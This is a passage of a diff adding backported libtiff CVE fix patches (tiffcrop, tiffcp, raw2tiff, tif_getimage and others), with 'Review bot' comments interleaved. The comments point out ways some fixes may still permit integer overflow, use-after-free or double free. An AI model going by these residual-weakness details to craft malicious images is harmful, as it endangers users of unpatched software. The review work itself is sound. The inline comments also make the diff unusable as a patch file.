+ colsize = ((bps * spp * length) + 7) / 8;
+ if ((colsize * width) > (rowsize * length))
+- buffsize = (colsize + 1) * width;
++{
++ if (((tmsize_t)colsize + 1) != 0 &&
++ (tmsize_t)width > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
++ ((tmsize_t)colsize + 1)))
++ {
++ TIFFError("rotateImage",
++ "Integer overflow when calculating buffer size.");
++ return (-1);
++ }
++ buffsize = ((tmsize_t)colsize + 1) * width;
++ }
+ else
+- buffsize = (rowsize + 1) * length;
++ {
++ if (((tmsize_t)rowsize + 1) != 0 &&
++ (tmsize_t)length > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
++ ((tmsize_t)rowsize + 1)))
++ {
++ TIFFError("rotateImage",
++ "Integer overflow when calculating buffer size.");
++ return (-1);
++ }
++ buffsize = (rowsize + 1) * length;
++ }
+
+ bytes_per_sample = (bps + 7) / 8;
+ bytes_per_pixel = ((bps * spp) + 7) / 8;
+@@ -8556,11 +8593,17 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ /* Add 3 padding bytes for extractContigSamplesShifted32bits */
+ if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
+ {
+- TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
++ TIFFError("rotateImage",
++ "Unable to allocate rotation buffer of %" TIFF_SSIZE_FORMAT
++ " bytes ",
++ buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ return (-1);
+ }
+ _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
+
++ if (rot_buf_size != NULL)
++ *rot_buf_size = buffsize;
++
+ ibuff = *ibuff_ptr;
+ switch (rotation)
+ {
+--
+2.25.1
+
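Review bot: In rotateImage's else branch the size is still computed as `buffsize = (rowsize + 1) * length;`, a 32-bit multiplication, although the overflow test just above it is done in `tmsize_t`; where tmsize_t is wider than 32 bits the test can pass while the product wraps, leaving buffsize smaller than the data the rotation writes. The if branch casts first, and the else branch should match: `buffsize = ((tmsize_t)rowsize + 1) * length;`. The selector `(colsize * width) > (rowsize * length)` is likewise evaluated in uint32 and can choose the wrong branch after wrapping. Separately, the body uses `rot_buf_size` but no hunk here changes the definition's parameter list, so this patch seems to build only together with a later one in the series. rotateImage starts and ends outside these hunks.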
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
new file mode 100644
index 0000000000..6a6596f092
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
@@ -0,0 +1,94 @@
+From 69818e2f2d246e6631ac2a2da692c3706b849c38 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sun, 29 Jan 2023 11:09:26 +0100
+Subject: [PATCH] tiffcrop: Amend rotateImage() not to toggle the input (main)
+ image width and length parameters when only cropped image sections are
+ rotated. Remove buffptr from region structure because never used.
+
+Closes #492 #493 #494 #495 #499 #518 #519
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/69818e2f2d246e6631ac2a2da692c3706b849c38]
+CVE: CVE-2023-25434 & CVE-2023-25435
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 29 +++++++++++++++++------------
+ 1 file changed, 17 insertions(+), 12 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index aab0ec6..ce84414 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
+ uint32, uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- unsigned char **, size_t *);
++ unsigned char **, size_t *, int);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -6382,10 +6382,11 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
+ /* Dummy variable in order not to switch two times the
+ * image->width,->length within rotateImage(),
+ * but switch xres, yres there. */
+- uint32_t width = image->width;
+- uint32_t length = image->length;
+- if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
+- {
++ uint32_t width = image->width;
++ uint32_t length = image->length;
++ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL,
++ TRUE))
++ {
+ TIFFError ("correct_orientation", "Unable to rotate image");
+ return (-1);
+ }
+@@ -7612,7 +7613,8 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ * accordingly. */
+ size_t rot_buf_size = 0;
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, &crop_buff, &rot_buf_size))
++ &crop->combined_length, &crop_buff, &rot_buf_size,
++ FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7721,9 +7723,10 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ * its size individually. Therefore, seg_buffs size needs to be
+ * updated accordingly. */
+ size_t rot_buf_size = 0;
+- if (rotateImage(
+- crop->rotation, image, &crop->regionlist[i].width,
+- &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
++ if (rotateImage(crop->rotation, image,
++ &crop->regionlist[i].width,
++ &crop->regionlist[i].length, &crop_buff,
++ &rot_buf_size, FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7853,7 +7856,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, crop_buff_ptr, NULL))
++ &crop->combined_length, crop_buff_ptr, NULL, TRUE))
+ {
+ TIFFError("createCroppedImage",
+ "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8515,8 +8518,10 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+
+ /* Rotate an image by a multiple of 90 degrees clockwise */
+ static int
+-rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+- uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
++rotateImage(uint16 rotation, struct image_data *image,
++ uint32 *img_width, uint32 *img_length,
++ unsigned char **ibuff_ptr, size_t *rot_buf_size,
++ int rot_image_params)
+ {
+ int shift_width;
+ uint32 bytes_per_pixel, bytes_per_sample;
+--
+2.25.1
+
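Review bot: The header tag `CVE: CVE-2023-25434 & CVE-2023-25435` separates the ids with `&`, whereas the combined CVE-2023-0800 patch in this series uses a plain space-separated list; tooling that reads the tag as a whitespace-separated list of ids may record only the first one and report the second as unpatched. I would write `CVE: CVE-2023-25434 CVE-2023-25435`. The subject also mentions removing `buffptr` from the region structure, but no hunk in this backport does that, so the description should say that part was left out.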
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
new file mode 100644
index 0000000000..b7a7e93764
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
@@ -0,0 +1,90 @@
+From ec8ef90c1f573c9eb1f17d6a056aa0015f184acf Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Tue, 14 Feb 2023 20:43:43 +0100
+Subject: [PATCH] tiffcrop: Do not reuse input buffer for subsequent images.
+ Fix issue 527
+
+Reuse of read_buff within loadImage() from previous image is quite unsafe, because other functions (like rotateImage() etc.) reallocate that buffer with different size without updating the local prev_readsize value.
+
+Closes #527
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
+CVE: CVE-2023-26965
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 40 ++++++++++------------------------------
+ 1 file changed, 10 insertions(+), 30 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index ce84414..a533089 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5935,9 +5935,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ uint32 tw = 0, tl = 0; /* Tile width and length */
+ tmsize_t tile_rowsize = 0;
+ unsigned char *read_buff = NULL;
+- unsigned char *new_buff = NULL;
+ int readunit = 0;
+- static tmsize_t prev_readsize = 0;
+
+ TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
+ TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
+@@ -6232,37 +6230,20 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ read_buff = *read_ptr;
+ /* +3 : add a few guard bytes since reverseSamples16bits() can read a bit */
+ /* outside buffer */
+- if (!read_buff)
++ if (read_buff)
+ {
+- if( buffsize > 0xFFFFFFFFU - 3 )
+- {
+- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+- return (-1);
+- }
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
++ _TIFFfree(read_buff);
+ }
+- else
+- {
+- if (prev_readsize < buffsize)
+- {
+- if( buffsize > 0xFFFFFFFFU - 3 )
+- {
+- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+- return (-1);
+- }
+- new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
+- if (!new_buff)
+- {
+- free (read_buff);
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+- }
+- else
+- read_buff = new_buff;
+- }
+- }
++ if (buffsize > 0xFFFFFFFFU - 3)
++ {
++ TIFFError("loadImage", "Required read buffer size too large");
++ return (-1);
++ }
++ read_buff =
++ (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!read_buff)
+ {
+- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
++ TIFFError("loadImage", "Unable to allocate read buffer");
+ return (-1);
+ }
+
+@@ -6270,7 +6251,6 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ read_buff[buffsize+1] = 0;
+ read_buff[buffsize+2] = 0;
+
+- prev_readsize = buffsize;
+ *read_ptr = read_buff;
+
+ /* N.B. The read functions used copy separate plane data into a buffer as interleaved
+--
+2.25.1
+
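Review bot: loadImage now releases the caller's buffer with `_TIFFfree(read_buff)` before the size test and the allocation, but `*read_ptr` is only updated after a successful allocation, so both `return (-1)` paths leave the caller holding a pointer to freed memory. Whether the caller reads or frees it again after a failure is outside the hunk; clearing it at the free makes the error paths safe either way: `_TIFFfree(read_buff); read_buff = NULL; *read_ptr = NULL;`. loadImage starts and ends outside these hunks.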
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
new file mode 100644
index 0000000000..48657e6aa4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
@@ -0,0 +1,35 @@
+From b0e1c25dd1d065200c8d8f59ad0afe014861a1b9 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Thu, 16 Feb 2023 12:03:16 +0100
+Subject: [PATCH] tif_luv: Check and correct for NaN data in uv_encode().
+
+Closes #530
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
+CVE: CVE-2023-26966
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_luv.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/libtiff/tif_luv.c b/libtiff/tif_luv.c
+index 6fe4858..8b2c5f1 100644
+--- a/libtiff/tif_luv.c
++++ b/libtiff/tif_luv.c
+@@ -923,6 +923,13 @@ uv_encode(double u, double v, int em) /* encode (u',v') coordinates */
+ {
+ register int vi, ui;
+
++ /* check for NaN */
++ if (u != u || v != v)
++ {
++ u = U_NEU;
++ v = V_NEU;
++ }
++
+ if (v < UV_VSTART)
+ return oog_encode(u, v);
+ vi = itrunc((v - UV_VSTART)*(1./UV_SQSIZ), em);
+--
+2.25.1
+
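Review bot: The NaN test in uv_encode is written as the self-comparison `u != u || v != v`, which reads like a mistake and is commonly flagged by static analysers. `if (isnan(u) || isnan(v))` states what the comment says; it needs math.h, whose inclusion is not visible in this hunk. Either form can be folded away if the file is ever built with finite-math optimisations, so the build flags for this file are worth a comment next to the check. The rest of uv_encode lies outside the hunk.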
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
new file mode 100644
index 0000000000..62a5e1831c
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
@@ -0,0 +1,33 @@
+From 8c0859a80444c90b8dfb862a9f16de74e16f0a9e Mon Sep 17 00:00:00 2001
+From: xiaoxiaoafeifei <lliangliang2007@163.com>
+Date: Fri, 21 Apr 2023 13:01:34 +0000
+Subject: [PATCH] countInkNamesString(): fix `UndefinedBehaviorSanitizer`:
+ applying zero offset to null pointer
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9bd48f0dbd64fb94dc2b5b05238fde0bfdd4ff3f]
+CVE: CVE-2023-2908
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_dir.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 9d8267a..6389b40 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -145,10 +145,10 @@ static uint16
+ countInkNamesString(TIFF *tif, uint32 slen, const char *s)
+ {
+ uint16 i = 0;
+- const char *ep = s + slen;
+- const char *cp = s;
+
+ if (slen > 0) {
++ const char *ep = s + slen;
++ const char *cp = s;
+ do {
+ for (; cp < ep && *cp != '\0'; cp++) {}
+ if (cp >= ep)
+--
+2.25.1
+
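Review bot: The `From` line names commit 8c0859a80444c90b8dfb862a9f16de74e16f0a9e while `Upstream-Status` links to commit 9bd48f0dbd64fb94dc2b5b05238fde0bfdd4ff3f, so the header points at two different upstream objects for one change. Please confirm which one the backport was taken from and make the two agree, or state in the header why they differ. In the code itself, moving `ep` and `cp` inside `if (slen > 0)` still forms `s + slen` when s is NULL and slen is non-zero; whether callers can pass that combination is outside the hunk.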
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
new file mode 100644
index 0000000000..8db24fc714
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
@@ -0,0 +1,59 @@
+From d63de61b1ec3385f6383ef9a1f453e4b8b11d536 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 3 Feb 2023 17:38:55 +0100
+Subject: [PATCH] TIFFClose() avoid NULL pointer dereferencing. fix#515
+
+Closes #515
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/d63de61b1ec3385f6383ef9a1f453e4b8b11d536]
+CVE: CVE-2023-3316
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_close.c | 11 +++++++----
+ tools/tiffcrop.c | 5 ++++-
+ 2 files changed, 11 insertions(+), 5 deletions(-)
+
+diff --git a/libtiff/tif_close.c b/libtiff/tif_close.c
+index e4228df..335e80f 100644
+--- a/libtiff/tif_close.c
++++ b/libtiff/tif_close.c
+@@ -118,13 +118,16 @@ TIFFCleanup(TIFF* tif)
+ */
+
+ void
+-TIFFClose(TIFF* tif)
++TIFFClose(TIFF *tif)
+ {
+- TIFFCloseProc closeproc = tif->tif_closeproc;
+- thandle_t fd = tif->tif_clientdata;
++ if (tif != NULL)
++ {
++ TIFFCloseProc closeproc = tif->tif_closeproc;
++ thandle_t fd = tif->tif_clientdata;
+
+ TIFFCleanup(tif);
+- (void) (*closeproc)(fd);
++ (void)(*closeproc)(fd);
++ }
+ }
+
+ /* vim: set ts=8 sts=8 sw=8 noet: */
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index a533089..f14bb0c 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -2526,7 +2526,10 @@ main(int argc, char* argv[])
+ }
+ }
+
+- TIFFClose(out);
++ if (out != NULL)
++ {
++ TIFFClose(out);
++ }
+
+ return (0);
+ } /* end main */
+--
+2.25.1
+
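Review bot: TIFFClose now accepts a NULL handle and returns without doing anything, but the comment block that ends just above the function is not updated to say so. I would add a line to it such as `* A NULL tif is accepted and ignored.` so callers know the guard is part of the contract rather than an accident. With that in place the added `if (out != NULL)` around `TIFFClose(out)` in tiffcrop's main is redundant, though harmless. The comment block starts outside the hunk.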
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
new file mode 100644
index 0000000000..67837fe142
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
@@ -0,0 +1,35 @@
+From 881a070194783561fd209b7c789a4e75566f7f37 Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Tue, 7 Mar 2023 15:02:08 +0800
+Subject: [PATCH] Fix memory leak in tiffcrop.c
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/881a070194783561fd209b7c789a4e75566f7f37]
+CVE: CVE-2023-3576
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/tiffcrop.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f14bb0c..7121c7c 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7746,8 +7746,13 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+
+ read_buff = *read_buff_ptr;
+
++ /* Memory is freed before crop_buff_ptr is overwritten */
++ if (*crop_buff_ptr != NULL)
++ {
++ _TIFFfree(*crop_buff_ptr);
++ }
++
+ /* process full image, no crop buffer needed */
+- crop_buff = read_buff;
+ *crop_buff_ptr = read_buff;
+ crop->combined_width = image->width;
+ crop->combined_length = image->length;
+--
+2.25.1
+
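Review bot: The added `_TIFFfree(*crop_buff_ptr)` runs immediately before `*crop_buff_ptr = read_buff;`, so after one call the crop pointer aliases the read buffer; if createCroppedImage is entered again with that alias still in place, the free releases the read buffer and the stale pointer is stored straight back, or the buffer is freed twice if it was already released elsewhere. Whether callers reset the pointer between images is outside the hunk. A guard such as `if (*crop_buff_ptr != NULL && *crop_buff_ptr != read_buff)` covers the aliasing case, and the ownership rule deserves a comment at this spot. The hunk also drops `crop_buff = read_buff;`, so any later use of the local `crop_buff` in the function should be checked.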
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
new file mode 100644
index 0000000000..fd67305c0b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
@@ -0,0 +1,47 @@
+From b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 5 May 2023 19:43:46 +0200
+Subject: [PATCH] Consider error return of writeSelections(). Fixes #553
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8]
+CVE: CVE-2023-3618
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 14 ++++++++++----
+ 1 file changed, 10 insertions(+), 4 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 7121c7c..93b7f96 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -2437,9 +2437,15 @@ main(int argc, char* argv[])
+ { /* Whole image or sections not based on output page size */
+ if (crop.selections > 0)
+ {
+- writeSelections(in, &out, &crop, &image, &dump, seg_buffs,
+- mp, argv[argc - 1], &next_page, total_pages);
+- }
++ if (writeSelections(in, &out, &crop, &image, &dump,
++ seg_buffs, mp, argv[argc - 1],
++ &next_page, total_pages))
++ {
++ TIFFError("main",
++ "Unable to write new image selections");
++ exit(EXIT_FAILURE);
++ }
++ }
+ else /* One file all images and sections */
+ {
+ if (update_output_file (&out, mp, crop.exp_mode, argv[argc - 1],
+@@ -7749,7 +7755,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ /* Memory is freed before crop_buff_ptr is overwritten */
+ if (*crop_buff_ptr != NULL)
+ {
+- _TIFFfree(*crop_buff_ptr);
++ _TIFFfree(*crop_buff_ptr);
+ }
+
+ /* process full image, no crop buffer needed */
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch
new file mode 100644
index 0000000000..6eb286039f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch
@@ -0,0 +1,34 @@
+From 4fc16f649fa2875d5c388cf2edc295510a247ee5 Mon Sep 17 00:00:00 2001
+From: Arie Haenel <arie.haenel@jct.ac.il>
+Date: Wed, 19 Jul 2023 19:34:25 +0000
+Subject: [PATCH] tiffcp: fix memory corruption (overflow) on hostile images
+ (fixes #591)
+
+Upstream-Status: Backport from [https://gitlab.com/libtiff/libtiff/-/commit/4fc16f649fa2875d5c388cf2edc295510a247ee5]
+CVE: CVE-2023-40745
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcp.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 83b3910..007bd05 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -1437,6 +1437,13 @@ DECLAREreadFunc(readSeparateTilesIntoBuffer)
+ TIFFError(TIFFFileName(in), "Error, cannot handle that much samples per tile row (Tile Width * Samples/Pixel)");
+ return 0;
+ }
++
++ if ( (imagew - tilew * spp) > INT_MAX ){
++ TIFFError(TIFFFileName(in),
++ "Error, image raster scan line size is too large");
++ return 0;
++ }
++
+ iskew = imagew - tilew*spp;
+ tilebuf = _TIFFmalloc(tilesize);
+ if (tilebuf == 0)
+--
+2.25.1
+
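Review bot: The added guard `(imagew - tilew * spp) > INT_MAX` only bounds the difference from above, and the declarations of imagew, tilew and spp are outside the hunk, so whether it fully protects the `iskew = imagew - tilew*spp` assignment that follows depends on their types. With unsigned operands a too-small imagew wraps to a huge value and is rejected; with signed operands a negative skew would pass the check. Please confirm the types in the 4.1.0 tools/tiffcp.c this is applied to, and that the file already includes `<limits.h>` for INT_MAX, since this patch adds no include while CVE-2023-41175.patch had to add one for raw2tiff.c. The header also writes `Upstream-Status: Backport from [...]` where the sibling patches use `Upstream-Status: Backport [...]`.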
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch
new file mode 100644
index 0000000000..3f44a42012
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch
@@ -0,0 +1,67 @@
+From 4cc97e3dfa6559f4d17af0d0687bcae07ca4b73d Mon Sep 17 00:00:00 2001
+From: Arie Haenel <arie.haenel@jct.ac.il>
+Date: Wed, 19 Jul 2023 19:40:01 +0000
+Subject: raw2tiff: fix integer overflow and bypass of the check (fixes #592)
+
+Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/6e2dac5f904496d127c92ddc4e56eccfca25c2ee]
+CVE: CVE-2023-41175
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/raw2tiff.c | 26 ++++++++++++++++++++++++++
+ 1 file changed, 26 insertions(+)
+
+diff --git a/tools/raw2tiff.c b/tools/raw2tiff.c
+index ab36ff4e..a905da52 100644
+--- a/tools/raw2tiff.c
++++ b/tools/raw2tiff.c
+@@ -35,6 +35,7 @@
+ #include <sys/types.h>
+ #include <math.h>
+ #include <ctype.h>
++#include <limits.h>
+
+ #ifdef HAVE_UNISTD_H
+ # include <unistd.h>
+@@ -101,6 +102,7 @@ main(int argc, char* argv[])
+ int fd;
+ char *outfilename = NULL;
+ TIFF *out;
++ uint32 temp_limit_check = 0;
+
+ uint32 row, col, band;
+ int c;
+@@ -212,6 +214,30 @@ main(int argc, char* argv[])
+ if (guessSize(fd, dtype, hdr_size, nbands, swab, &width, &length) < 0)
+ return 1;
+
++ if ((width == 0) || (length == 0) ){
++ fprintf(stderr, "Too large nbands value specified.\n");
++ return (EXIT_FAILURE);
++ }
++
++ temp_limit_check = nbands * depth;
++
++ if ( !temp_limit_check || length > ( UINT_MAX / temp_limit_check ) ) {
++ fprintf(stderr, "Too large length size specified.\n");
++ return (EXIT_FAILURE);
++ }
++ temp_limit_check = temp_limit_check * length;
++
++ if ( !temp_limit_check || width > ( UINT_MAX / temp_limit_check ) ) {
++ fprintf(stderr, "Too large width size specified.\n");
++ return (EXIT_FAILURE);
++ }
++ temp_limit_check = temp_limit_check * width;
++
++ if ( !temp_limit_check || hdr_size > ( UINT_MAX - temp_limit_check ) ) {
++ fprintf(stderr, "Too large header size specified.\n");
++ return (EXIT_FAILURE);
++ }
++
+ if (outfilename == NULL)
+ outfilename = argv[optind+1];
+ out = TIFFOpen(outfilename, "w");
+--
+2.30.2
+
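Review bot: `temp_limit_check = nbands * depth;` is computed before any bound is applied, so that first product can itself wrap in 32 bits, and the `UINT_MAX` comparisons that follow would then test a truncated value. The declarations of nbands and depth are outside the hunk, so this matters only if nbands reaches this point unchecked; if it does, a guard such as `if (depth <= 0 || nbands > UINT_MAX / (uint32)depth)` ahead of the multiplication would close it, and is better raised upstream than carried as a local divergence. The message for the `width == 0 || length == 0` case says "Too large nbands value specified", which does not describe what was tested. Separately, the `From` hash (4cc97e3d...) differs from the commit cited in Upstream-Status (6e2dac5f...), and CVE-2022-1354.patch and CVE-2022-1355.patch show the same mismatch between their `From` line and the cited commit; a header line saying which commit the backport was compared against would help anyone auditing it.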
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch
new file mode 100644
index 0000000000..1b651e6529
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch
@@ -0,0 +1,53 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFErrorExt instead of TIFFErrorExtR (the latter did not exist yet);
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 51558511bdbbcffdce534db21dbaf5d54b31638a Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 15:58:41 +0100
+Subject: [PATCH] TIFFReadRGBAStrip/TIFFReadRGBATile: add more validation of
+ col/row (fixes #622)
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-52356.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/51558511bdbbcffdce534db21dbaf5d54b31638a]
+CVE: CVE-2023-52356
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_getimage.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_getimage.c
++++ tiff-4.1.0+git191117/libtiff/tif_getimage.c
+@@ -2926,6 +2926,13 @@ TIFFReadRGBAStripExt(TIFF* tif, uint32 r
+ }
+
+ if (TIFFRGBAImageOK(tif, emsg) && TIFFRGBAImageBegin(&img, tif, stop_on_error, emsg)) {
++ if (row >= img.height)
++ {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
++ "Invalid row passed to TIFFReadRGBAStrip().");
++ TIFFRGBAImageEnd(&img);
++ return (0);
++ }
+
+ img.row_offset = row;
+ img.col_offset = 0;
+@@ -3002,6 +3009,14 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 co
+ return( 0 );
+ }
+
++ if (col >= img.width || row >= img.height)
++ {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
++ "Invalid row/col passed to TIFFReadRGBATile().");
++ TIFFRGBAImageEnd(&img);
++ return (0);
++ }
++
+ /*
+ * The TIFFRGBAImageGet() function doesn't allow us to get off the
+ * edge of the image, even to fill an otherwise valid tile. So we
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch
new file mode 100644
index 0000000000..a777dea9b0
